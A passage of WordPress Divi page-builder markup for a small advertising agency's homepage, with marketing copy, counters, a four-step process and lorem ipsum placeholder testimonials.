Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Best Agency to choose\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" 